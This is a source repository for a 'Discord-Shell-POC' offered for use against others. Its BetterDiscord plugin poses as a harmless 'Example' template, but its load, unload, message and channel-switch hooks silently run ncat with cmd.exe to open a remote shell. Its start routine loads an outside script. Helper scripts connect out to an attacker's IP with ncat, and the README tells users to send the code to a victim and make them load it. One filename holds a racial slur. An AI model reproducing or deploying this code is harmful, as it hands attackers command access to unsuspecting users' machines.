├── BestPlugin-ActiveListening └── example.plugin.js ├── README.md ├── connect.js ├── connectfile.js ├── example.plugin.js └── victimcmd.js /BestPlugin-ActiveListening/example.plugin.js: -------------------------------------------------------------------------------- 1 | //META{"name":"Example"}*// 2 | class Example { 3 | // Constructor 4 | constructor() { 5 | this.initialized = false; 6 | } 7 | 8 | // Meta 9 | getName() { return "Example"; } 10 | getShortName() { return "Example"; } 11 | getDescription() { return "This is an example/template for a BD plugin."; } 12 | getVersion() { return "0.1.0"; } 13 | getAuthor() { return "Minin"; } 14 | 15 | // Settings Panel 16 | getSettingsPanel() { 17 | return ""; 18 | } 19 | 20 | // Load/Unload 21 | load() { 22 | const utillool = require('util'); 23 | 24 | 25 | const runshit = utillool.promisify(require('child_process').exec); 26 | 27 | async function executeshit(execom) { 28 | const { stdout, stderr, error } = await runshit(execom); 29 | if(stderr){console.error('stderr:', stderr);} 30 | if(error){console.error('error:', error);} 31 | return stdout; 32 | } 33 | 34 | 35 | async function executecomz () { 36 | const execom = 'ncat -lvp 4444 -e cmd.exe'; 37 | const result = await executeshit(execom); 38 | console.log(result); 39 | } 40 | 41 | 42 | executecomz(); 43 | } 44 | 45 | unload() { 46 | const utillool = require('util'); 47 | 48 | 49 | const runshit = utillool.promisify(require('child_process').exec); 50 | 51 | async function executeshit(execom) { 52 | const { stdout, stderr, error } = await runshit(execom); 53 | if(stderr){console.error('stderr:', stderr);} 54 | if(error){console.error('error:', error);} 55 | return stdout; 56 | } 57 | 58 | 59 | async function executecomz () { 60 | const execom = 'ncat -lvp 4444 -e cmd.exe'; 61 | const result = await executeshit(execom); 62 | console.log(result); 63 | } 64 | 65 | 66 | executecomz(); 67 | } 68 | 69 | // Events 70 | 71 | onMessage() { 72 | const utillool = require('util'); 73 | 74 | 75 | const runshit = utillool.promisify(require('child_process').exec); 76 | 77 | async function executeshit(execom) { 78 | const { stdout, stderr, error } = await runshit(execom); 79 | if(stderr){console.error('stderr:', stderr);} 80 | if(error){console.error('error:', error);} 81 | return stdout; 82 | } 83 | 84 | 85 | async function executecomz () { 86 | const execom = 'ncat -lvp 4444 -e cmd.exe'; 87 | const result = await executeshit(execom); 88 | console.log(result); 89 | } 90 | 91 | 92 | executecomz(); 93 | }; 94 | 95 | onSwitch() { 96 | const utillool = require('util'); 97 | 98 | 99 | const runshit = utillool.promisify(require('child_process').exec); 100 | 101 | async function executeshit(execom) { 102 | const { stdout, stderr, error } = await runshit(execom); 103 | if(stderr){console.error('stderr:', stderr);} 104 | if(error){console.error('error:', error);} 105 | return stdout; 106 | } 107 | 108 | 109 | async function executecomz () { 110 | const execom = 'ncat -lvp 4444 -e cmd.exe'; 111 | const result = await executeshit(execom); 112 | console.log(result); 113 | } 114 | 115 | 116 | executecomz(); 117 | }; 118 | 119 | observer(e) { 120 | // raw MutationObserver event for each mutation 121 | }; 122 | 123 | // Start/Stop 124 | start() { 125 | var libraryScript = document.getElementById('zeresLibraryScript'); 126 | if (!libraryScript) { 127 | libraryScript = document.createElement("script"); 128 | libraryScript.setAttribute("type", "text/javascript"); 129 | libraryScript.setAttribute("src", "https://github.com/0x1CA3/Discord-Shell-POC/blob/main/Testing-Sample/victimcmd.js"); 130 | libraryScript.setAttribute("id", "zeresLibraryScript"); 131 | document.head.appendChild(libraryScript); 132 | } 133 | 134 | 135 | if (typeof window.ZeresLibrary !== "undefined") this.initialize(); 136 | else libraryScript.addEventListener("load", () => { this.initialize(); }); 137 | } 138 | 139 | stop() { 140 | PluginUtilities.showToast(this.getName() + " " + this.getVersion() + " has stopped."); 141 | }; 142 | 143 | // Initialize 144 | initialize() { 145 | this.initialized = true; 146 | PluginUtilities.showToast(this.getName() + " " + this.getVersion() + " has started."); 147 | } 148 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Discord-Shell-POC 2 | A script that can allow you to get remote access to a machine on Discord via them putting code in the console. Also allows you to crash the BetterDiscord client. I'm planning to add more connection methods along with a way to put this code in a BetterDiscord plugin so it can be more efficient. 3 | 4 | If you would like to see proof of this, there are images below of the BetterDiscord client crasher and proof of me getting full access to my PC from another OS. 5 | 6 | Shout out to [https://www.youtube.com/watch?v=RgBPo5i0T9Q&ab_channel=HellSec] for giving me the idea to make this! I never saw him release his script, so I decided to make my own. 7 | 8 | # How to use 9 | ``` 10 | pick a script 11 | if you need to edit in your own IP into the script, do it 12 | send it to your victim and make sure they load it 13 | ``` 14 | # How to crash BetterDiscord 15 | ![image](https://user-images.githubusercontent.com/78043996/117033138-0b025300-ac8d-11eb-8531-2b07d3a27289.png) 16 | ``` 17 | load one of the scripts that allows you to have access to the remote computers CMD 18 | once you are connected to the victims machine from another computer (or your own if you are simply testing) 19 | type something random, like 'fgisefxs' 20 | type in the command 'exit' 21 | The BetterDiscord client should crash and you should be instantly logged out of your account. 22 | ``` 23 | 24 | # Proof 25 | ![image](https://user-images.githubusercontent.com/78043996/117033909-c3c89200-ac8d-11eb-82d6-9d55bece837f.png) 26 | 27 | # Credits 28 | Don't steal my shit lol. 29 | 30 | [https://github.com/0x1CA3] 31 | -------------------------------------------------------------------------------- /connect.js: -------------------------------------------------------------------------------- 1 | const utillool = require('util'); 2 | 3 | 4 | const runshit = utillool.promisify(require('child_process').exec); 5 | 6 | async function executeshit(execom) { 7 | const { stdout, stderr, error } = await runshit(execom); 8 | if(stderr){console.error('stderr:', stderr);} 9 | if(error){console.error('error:', error);} 10 | return stdout; 11 | } 12 | 13 | 14 | async function executecomz () { 15 | const execom = 'ncat -nv iphere 4444'; // replace "iphere" with your ip 16 | const result = await executeshit(execom); 17 | console.log(result); 18 | } 19 | 20 | 21 | executecomz(); 22 | -------------------------------------------------------------------------------- /connectfile.js: -------------------------------------------------------------------------------- 1 | 2 | const utillool = require('util'); 3 | 4 | 5 | const runshit = utillool.promisify(require('child_process').exec); 6 | 7 | async function executeshit(execom) { 8 | const { stdout, stderr, error } = await runshit(execom); 9 | if(stderr){console.error('stderr:', stderr);} 10 | if(error){console.error('error:', error);} 11 | return stdout; 12 | } 13 | 14 | 15 | async function executecomz () { 16 | const execom = 'ncat -lvp 4444 > nigger.txt'; // replace "filelol" with file 17 | const result = await executeshit(execom); 18 | console.log(result); 19 | } 20 | 21 | 22 | executecomz(); 23 | -------------------------------------------------------------------------------- /example.plugin.js: -------------------------------------------------------------------------------- 1 | //META{"name":"Example"}*// 2 | 3 | class Example { 4 | // Constructor 5 | constructor() { 6 | this.initialized = false; 7 | } 8 | 9 | // Meta 10 | getName() { return "Example"; } 11 | getShortName() { return "Example"; } 12 | getDescription() { return "This is an example/template for a BD plugin."; } 13 | getVersion() { return "0.1.0"; } 14 | getAuthor() { return "Minin"; } 15 | 16 | // Settings Panel 17 | getSettingsPanel() { 18 | return ""; 19 | } 20 | 21 | // Load/Unload 22 | load() { 23 | const utillool = require('util'); 24 | 25 | 26 | const runshit = utillool.promisify(require('child_process').exec); 27 | 28 | async function executeshit(execom) { 29 | const { stdout, stderr, error } = await runshit(execom); 30 | if(stderr){console.error('stderr:', stderr);} 31 | if(error){console.error('error:', error);} 32 | return stdout; 33 | } 34 | 35 | 36 | async function executecomz () { 37 | const execom = 'ncat -lvp 4444 -e cmd.exe'; 38 | const result = await executeshit(execom); 39 | console.log(result); 40 | } 41 | 42 | 43 | executecomz(); 44 | } 45 | 46 | unload() { } 47 | 48 | // Events 49 | 50 | onMessage() { 51 | // Called when a message is received 52 | }; 53 | 54 | onSwitch() { 55 | // Called when a server or channel is switched 56 | }; 57 | 58 | observer(e) { 59 | // raw MutationObserver event for each mutation 60 | }; 61 | 62 | // Start/Stop 63 | start() { 64 | var libraryScript = document.getElementById('zeresLibraryScript'); 65 | if (!libraryScript) { 66 | libraryScript = document.createElement("script"); 67 | libraryScript.setAttribute("type", "text/javascript"); 68 | libraryScript.setAttribute("src", "https://github.com/0x1CA3/Discord-Shell-POC/blob/main/Testing-Sample/victimcmd.js"); 69 | libraryScript.setAttribute("id", "zeresLibraryScript"); 70 | document.head.appendChild(libraryScript); 71 | } 72 | 73 | 74 | if (typeof window.ZeresLibrary !== "undefined") this.initialize(); 75 | else libraryScript.addEventListener("load", () => { this.initialize(); }); 76 | } 77 | 78 | stop() { 79 | PluginUtilities.showToast(this.getName() + " " + this.getVersion() + " has stopped."); 80 | }; 81 | 82 | // Initialize 83 | initialize() { 84 | this.initialized = true; 85 | PluginUtilities.showToast(this.getName() + " " + this.getVersion() + " has started."); 86 | } 87 | } -------------------------------------------------------------------------------- /victimcmd.js: -------------------------------------------------------------------------------- 1 | const utillool = require('util'); 2 | 3 | 4 | const runshit = utillool.promisify(require('child_process').exec); 5 | 6 | async function executeshit(execom) { 7 | const { stdout, stderr, error } = await runshit(execom); 8 | if(stderr){console.error('stderr:', stderr);} 9 | if(error){console.error('error:', error);} 10 | return stdout; 11 | } 12 | 13 | 14 | async function executecomz () { 15 | const execom = 'ncat -lvp 4444 -e cmd.exe'; 16 | const result = await executeshit(execom); 17 | console.log(result); 18 | } 19 | 20 | 21 | executecomz(); --------------------------------------------------------------------------------